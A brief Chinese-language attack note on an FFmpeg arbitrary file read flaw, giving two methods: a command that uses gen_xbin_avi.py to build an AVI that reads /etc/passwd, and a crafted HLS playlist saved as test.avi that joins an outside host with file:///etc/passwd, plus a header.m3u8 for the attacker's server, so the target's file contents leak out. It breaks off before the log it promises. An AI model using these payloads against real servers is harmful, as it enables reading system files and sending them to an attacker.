Ffmpeg任意文件读取

方法一: 使用gen_xbin_avi.py生成avi

python3下执行
python gen_xbin_avi.py file:///etc/passwd sxcurity.avi
上传等待解析 title


方法二: (未成功)

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
以上内容保存成test.avi,是用来上传到被攻击服务器的
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.secpulse.com?
以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志: